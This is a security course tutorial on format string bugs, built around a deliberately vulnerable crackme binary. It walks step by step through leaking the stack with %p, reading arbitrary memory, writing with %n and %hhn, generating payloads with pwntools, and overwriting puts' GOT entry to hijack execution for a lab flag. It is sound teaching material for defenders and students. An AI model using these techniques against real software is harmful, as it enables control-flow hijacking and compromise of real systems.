Tut05: Format String Vulnerability

In this tutorial, we'll explore a powerful new class of bug, called a "format string vulnerability". Though it looks benign at first, this type of bug allows for arbitrary reads and writes in memory, and thus, arbitrary code execution.

Step 0. Enhanced crackme0x00

We've finally eliminated the buffer overflow vulnerability in the crackme0x00 binary. Let's check out the new implementation!

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <err.h>

#include "flag.h"

unsigned int secret = 0xdeadbeef;

void handle_failure(char *buf) {
  char msg[100];
  snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
  printf(msg);
}

int main(int argc, char *argv[])
{
  setreuid(geteuid(), geteuid());
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

  int tmp = secret;

  char buf[100];
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  fgets(buf, sizeof(buf), stdin);

  if (!strcmp(buf, "250382\n")) {
    printf("Password OK :)\n");
  } else {
    handle_failure(buf);
  }

  if (tmp != secret) {
    puts("The secret is modified!\n");
  }

  return 0;
}

$ checksec --file crackme0x00
[*] '/home/lab05/tut05-fmtstr/crackme0x00'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

As you can see, it's a fully protected binary.

NOTE. These two lines immediately flush your input and output buffers. They're just there to make your life easier.

setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);

It works similarly to before, but when we type an incorrect password, it now produces an error message like this:

$ ./crackme0x00
IOLI Crackme Level 0x00
Password:asdf
Invalid Password! asdf

Unfortunately, this program is using printf() in a very insecure way.

snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
printf(msg);

Notice that after the first line above, msg will contain your input (the invalid password). If that input happens to contain a format specifier (%), the printf() in the second line will interpret it. This creates a security issue.

Some common format specifiers are:

  • %p: pointer
  • %s: string
  • %d: int
  • %x: hex

Let's try typing %p:

$ ./crackme0x00
IOLI Crackme Level 0x00
Password:%p
Invalid Password! 0x64

What's 0x64 in base-10? What do you think this represents in the code?

Let's go crazy by putting more %ps. How about 15?

$ echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p" | ./crackme0x00
Password:Invalid Password! 1=0x64|2=0x8048a40|3=0xffe1f428 ...

We seem to be able to see the values for 15 (or more -- we chose 15 arbitrarily) nonexistent arguments to the printf() call.

1=0x64
2=0x8048a40
3=0xffe1f428
4=0xf7f3ce89
...
10=0x61766e49
11=0x2064696c
12=0x73736150
13=0x64726f77
14=0x3d312021
15=0x327c7025

Where are those values coming from?

By the way, it's rather tedious to put lots of %ps to see these values. Luckily, printf-like functions provide a convenient way to access the n'th argument: %[nth]$p (e.g., %1$p = first argument). Let's try it:

$ echo '%10$p' | ./crackme0x00
IOLI Crackme Level 0x00
Password:Invalid Password! 0x61766e49

As expected, the value printed matches the tenth one listed above.

NOTE: Be sure to use single quotes (') rather than double quotes ("), to prevent your shell from trying to interpret the $ itself (e.g., like $PATH). If you do later need a format-string argument that includes interpolation, use " and backslash-escape the format-specifier $s (i.e., "\$").

Step 1. Using the Format String Bug to Perform an Arbitrary Read

Let's exploit this format-string bug to write an arbitrary value to an arbitrary memory address.

Have you noticed these interesting values in the output earlier?

4=0xf7f3ce89
...
10=0x61766e49  'Inva'
11=0x2064696c  'lid '
12=0x73736150  'Pass'
13=0x64726f77  'word'
14=0x3d312021  '! 1='
15=0x327c7025  '%p|2'

We can actually see our input string itself. We know that that string is stored on the stack, so it seems that what we put onto the stack is actually being interpreted as additional printf() arguments. What's going on?

When you invoke a printf()-like function, your arguments are passed via the stack, like this:

printf("%s", a1, a2);

[ ra ]
[ s  ] --+  < 1st printf() argument: pointer to the format string
[ a1 ]   |  < 2nd printf() argument: a1, the 1st format-string argument (aka %1$s)
[ a2 ]   |  < 3rd printf() argument: a2, the 2nd format-string argument (aka %2$s)
["%s"] <-+  < the actual string data itself, on the stack
[ ...]

Only three arguments are passed to printf() here, but printf() itself has no way of knowing that. So if the format string calls for higher-numbered arguments, printf() will faithfully read more data from the stack, since that's where those arguments would be if they did exist.

In this simple case, the third "argument" (i.e. %3$s) happens to be the format string data itself, so we have full control over its value! You can take advantage of this to read a few bytes from an arbitrary memory address, like this:

printf("\xaa\xaa\xaa\xaa%3$s", a1, a2);

    [ ra ]
    [ s  ] --+
    [ a1 ]   |
    [ a2 ]   |
+-- [aaaa] <-+
|   [ ...]
|
V
?

This reads and prints a string (%s) at an address indicated by "the third argument," which we've set up to contain address 0xaaaaaaaa. By modifying the value of that address, we can make printf() read a string from anywhere.

In the case of the actual target binary, where is your input string located on the stack? That is, what value of N below results in this output?:

$ echo 'BBAAAA%N$p' | ./crackme0x00
IOLI Crackme Level 0x00
Password:Invalid Password! BBAAAA0x41414141

What happens if we then replace %p with %s? How does it crash?

You can examine the stack to understand how the format string bug works. As you can see, there are pointers to your input string AABBBB in the 3rd and 7th entries of the stack, and a copy of the value BBBB itself exists in the 15th entry.

pwndbg> x/100i handle_failure
   0x804880b <handle_failure>:          push   ebp
   0x804880c <handle_failure+1>:        mov    ebp,esp
   0x804880e <handle_failure+3>:        sub    esp,0x88
   ...
   0x8048841 <handle_failure+54>:       push   eax
   0x8048842 <handle_failure+55>:       call   0x8048520 <printf@plt>

pwndbg> b *0x8048842
Breakpoint 1 at 0x8048842: file crackme0x00.c, line 14.

pwndbg> r
Starting program: /home/lab05/tut05-fmtstr/crackme0x00 AAAABBBBCCCC

IOLI Crackme Level 0x00
Password:AABBBB

pwndbg> stack 30
    00:0000| esp    0xffd86b50 -> 0xffd86b78 <- 0x61766e49 ('Inva')
    01:0004|        0xffd86b54 <- 0x64 /* 'd' */
    02:0008|        0xffd86b58 -> 0x8048a40 <- dec    ecx
    03:000c|        0xffd86b5c -> 0xffd86c18 <- 'AABBBB\n'
    04:0010|        0xffd86b60 -> 0xf7f0eeb9
    05:0014|        0xffd86b64 <- 0x1
    06:0018|        0xffd86b68 <- 0x0
    07:001c|        0xffd86b6c -> 0xffd86c18 <- 'AABBBB\n'
    08:0020|        0xffd86b70 -> 0x804a00c (_GLOBAL_OFFSET_TABLE_+12)
    09:0024|        0xffd86b74 -> 0xf7f14028 (_dl_fixup+184)
    0a:0028| eax    0xffd86b78 <- 0x61766e49 ('Inva')
    0b:002c|        0xffd86b7c <- 0x2064696c ('lid ')
    0c:0030|        0xffd86b80 <- 0x73736150 ('Pass')
    0d:0034|        0xffd86b84 <- 'word! AABBBB\n\n'
    0e:0038|        0xffd86b88 <- '! AABBBB\n\n'
=>  0f:003c|        0xffd86b8c <- 'BBBB\n\n'

You can check this yourself, too. If you try to print the 3rd or 7th argument as a string, it inserts a copy of your input:

lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%3$s
Invalid Password! AABBBBAABBBB%3$s

lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%7$s
Invalid Password! AABBBBAABBBB%7$s

But attempting to dereference the 15th stack entry causes a segmentation fault because that value is not a pointer, but rather the raw string "BBBB":

lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
IOLI Crackme Level 0x00
Password:AABBBB%15$s
Segmentation fault (core dumped)

What happens if you replace the "BBBB" with a valid address and try that again?

[Task] How can you use this to read the global variable "secret"?

You can find the address of secret using nm (or GDB or Ghidra):

$ nm crackme0x00 | grep secret
0804a050 D secret

Step 2. Using the Format String Bug to Perform an Arbitrary Write

printf() is very complex, and actually even supports a sort of "write" operation: it can write the total number of bytes printed so far to a specified location.

  • %n: write number of bytes printed (as an int)
int len;
printf("aaaa%nbbbb", &len);
// `len` now contains 4, because 4 bytes had been printed so far at that point

Using this, and a similar trick to the arbitrary read, you can write to an arbitrary memory location like this:

printf("\xaa\xaa\xaa\xaa%3$n", a1, a2);

     [ ra ]
     [ s  ] --+
     [ a1 ]   |
     [ a2 ]   |
 +-- [aaaa] <-+
 |   [ ...]
 |
 V
...

*0xaaaaaaaa = 4 (i.e., 4 "\xaa"s have been printed so far)

With this idea, we clearly have full control over the address, but so far it seems we can only write the number "4" there. How can we write an arbitrary value?

To do that, we need to use another useful printf() format specifier: %[len]d (e.g., %10d). This prints an integer (we don't care which one) using at minimum len characters. This can be used to quickly raise the value that %n will write, without requiring an excessively long format string.

For example, to write 10 to 0xaaaaaaaa, you can print 6 more characters, like this:

printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2);
                        ^^^

*0xaaaaaaaa = 10;

And now you can write an arbitrary value to an arbitrary location. Almost.

Let's suppose you want to write the value 0xc0ffee to 0xaaaaaaaa. We'd prefer to avoid having to generate 12648430 bytes of output, so it'd be better to write this value byte-by-byte instead, which would involve far smaller numbers. You might think to do that with these operations:

*(int *)0xaaaaaaaa = 0x000000ee;
*(int *)0xaaaaaaab = 0x000000ff;
*(int *)0xaaaaaaac = 0x000000c0;

But the problem is that once characters have been printed, they can't be "un-printed", so the values that we write must strictly increase over time. So the writes would need to be done in this order:

*(int *)0xaaaaaaac = 0x000000c0;
*(int *)0xaaaaaaaa = 0x000000ee;
*(int *)0xaaaaaaab = 0x000000ff;

But when you write the 4-byte integer 0x000000ee to 0xaaaaaaaa, you overwrite the byte 0xc0 at 0xaaaaaaac with a null byte. So that won't work.

There is a solution! There exist smaller-sized versions of %n:

  • %hn: write number of bytes printed (as a short)
  • %hn: write number of bytes printed (as a byte)

That is, you can do this:

printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2);

*(unsigned char*)0xaaaaaaaa = 10;

This solves two problems at the same time:

  • We can now perform the writes in any order, because they no longer overwrite each other with extra null bytes.
  • Since only the lowest 8 bits of the value are written, we can make the value decrease by using integer overflow. For example, if we've written the value 0xff, and we want to write 0xc0 next, we can do that by generating 0xc1 bytes of additional string output so that the counter reaches 0x1c0, which will then be truncated to 0xc0 when written as a single byte.
*(unsigned char*)0xaaaaaaaa = 0xee;
*(unsigned char*)0xaaaaaaab = 0xff;
*(unsigned char*)0xaaaaaaac = 0xc0;  // lowest 8 bits of 0x1c0

[Task] Can you overwrite the secret value with 0xc0ffee?

Step 3. Using pwntools

It's important to understand the core idea of how to construct a format string that writes an arbitrary value to an arbitrary location, but when you try to actually implement one, you'll quickly find that it's very tedious to do manually. Fortunately, pwntools provides a format string exploit generator for you.

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  • offset (int): the first formatter's offset you control
  • writes (dict): dict with addr, value {addr: value, addr2: value2}
  • numbwritten (int): the number of bytes already written by printf()

Let's say we'd like to write 0xc0ffee to *0xaaaaaaaa, and we have control of the format string at the 4th param (i.e., %4$p), but we've already printed out 10 characters.

$ python3 -c 'from pwn import*; print(fmtstr_payload(4, {0xaaaaaaaa: 0xc0ffee}, 10))'
%228c%13$n%17c%14$hhn%193c%15$hhnaaa\xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa

[Task] Is this similar to what you've come up with to write 0xc0ffee to the secret value? Please modify template.py to overwrite the secret value (if you succeed, the binary will print "The secret is modified!")!

Step 4. Arbitrary Execution!

Your task for today is to launch a control-hijacking attack using this format string vulnerability. The plan is simple: overwrite the GOT of puts() with the address of print_key(), so that when puts() is invoked, execution is actually redirected to print_key().

Here's an explanation of the GOT in case you haven't heard of it. The Global Offset Table ("GOT" for short) is a table in the process's memory which contains pointers to external functions (e.g., puts() or printf() in libc). Each entry corresponds to one function the compiler expects the binary to use.

When a dynamic loader such as ld initially loads the program, the GOT is (roughly speaking -- the actual behavior will be demonstrated shortly) filled with pointers to "_dl_runtime_resolve()":

[&_dl_runtime_resolve]  <- entry for printf()
[&_dl_runtime_resolve]  <- entry for puts()
[&_dl_runtime_resolve]  <- entry for scanf()
[&_dl_runtime_resolve]  <- entry for exit()
...

The first time the process attempts to call an external function through this table, _dl_runtime_resolve() is invoked. It obtains the real address of the desired function (i.e., the real address of puts() in libc), updates the table, and calls the function.

[&_dl_runtime_resolve]  <- entry for printf()
[&puts]                 <- entry for puts()
[&_dl_runtime_resolve]  <- entry for scanf()
[&_dl_runtime_resolve]  <- entry for exit()
...

After that, any further calls to the same external function (e.g., puts()) will therefore be immediately directed to the real address.

Let's see this in action. Here's the code snippet in main() that calls puts("The secret is modified!\n"):

0x0804891b <+189>:	sub    esp,0xc
0x0804891e <+192>:	push   0x8048a80
0x08048923 <+197>:	call   0x8048590 <puts@plt>

Note that "puts@plt" is not the real "puts()" in libc -- 0x80490a0 is in your code section (try vmmap 0x80490a0). The real puts() from libc is located here:

  > x/4i puts
   0xf7db7b40 <puts>:   push   ebp
   0xf7db7b41 <puts+1>:	mov    ebp,esp
   0xf7db7b43 <puts+3>:	push   edi
   0xf7db7b44 <puts+4>:	push   esi

puts@plt means "puts at the Procedure Linkage Table (PLT)"; it points to one of the entries in the PLT:

> pdisas 0x8048590-0x20
 > 0x8048570 <err@plt>           jmp    dword ptr [err@got.plt]       <0x804a024>

   0x8048576 <err@plt+6>         push   0x30
   0x804857b <err@plt+11>        jmp    0x8048500                     <0x8048500>

   0x8048580 <fread@plt>         jmp    dword ptr [fread@got.plt]     <0x804a028>

   0x8048586 <fread@plt+6>       push   0x38
   0x804858b <fread@plt+11>      jmp    0x8048500                     <0x8048500>

   0x8048590 <puts@plt>          jmp    dword ptr [puts@got.plt]      <0x804a02c>

   0x8048596 <puts@plt+6>        push   0x40
   0x804859b <puts@plt+11>       jmp    0x8048500                     <0x8048500>

   ...

As you can see, the PLT is a table containing (among other things) stub functions that each just jump to an address read from the GOT. puts@got.plt (0x804a02c) is the actual GOT entry for puts(), where the address is stored.

Let's follow this call (i.e., single-stepping into the call with stepi):

 > 0x8048590  <puts@plt>                  jmp    dword ptr [puts@got.plt]      <0x804a02c>

   0x8048596  <puts@plt+6>                push   0x40
   0x804859b  <puts@plt+11>               jmp    0x8048500                     <0x8048500>
    v
   0x8048500                              push   dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804a004>
   0x8048506                              jmp    dword ptr [0x804a008]         <_dl_runtime_resolve>
    v
   0xf7fb8dd0 <_dl_runtime_resolve>       push   eax
   0xf7fafe11 <_dl_runtime_resolve+1>     push   ecx
   0xf7fafe12 <_dl_runtime_resolve+2>     push   edx

The GOT entry for puts() (puts@got.plt) initially points to puts@plt+6, which is the next instruction after puts@plt. This ends up invoking _dl_runtime_resolve() with two parameters: a pointer to the start of the GOT itself (_GLOBAL_OFFSET_TABLE_+4), and a value indicating which function should be resolved (0x40, meaning puts()). Once _dl_runtime_resolve() is done, puts@got.plt will point to the real puts() in libc (0xf7e11b40 in this case).

Your goal is to use a format string to overwrite the GOT entry of puts() with another function's address, so that execution will be hijacked when puts() is called.

There are two challenges you'll encounter when doing this:

  1. In order to reach the only call to puts() that occurs after your format string is parsed, you must also overwrite the secret value:

    if (tmp != secret) {
      puts("The secret is modified!\n");
    }
    

    [Task] What should the "writes" param for fmtstr_payload() be?

  2. Unfortunately, the size of the buffer is very limited, meaning it might not be able to fit the format strings for both write targets.

    void handle_failure(char *buf) {
      char msg[100];
      ...
    }
    

Do you remember the %hn/%hhn trick that lets you overwrite fewer bytes at a time, like one or two? That's where write_size comes into play:

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  • write_size (str): must be byte, short or int. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)

Finally! Can you hijack the puts() invocation to redirect it to print_key() to get your flag for this tutorial?

[Task] In the given template.py, modify the payload to redirect the puts() invocation to print_key(), and get your flag!

Reference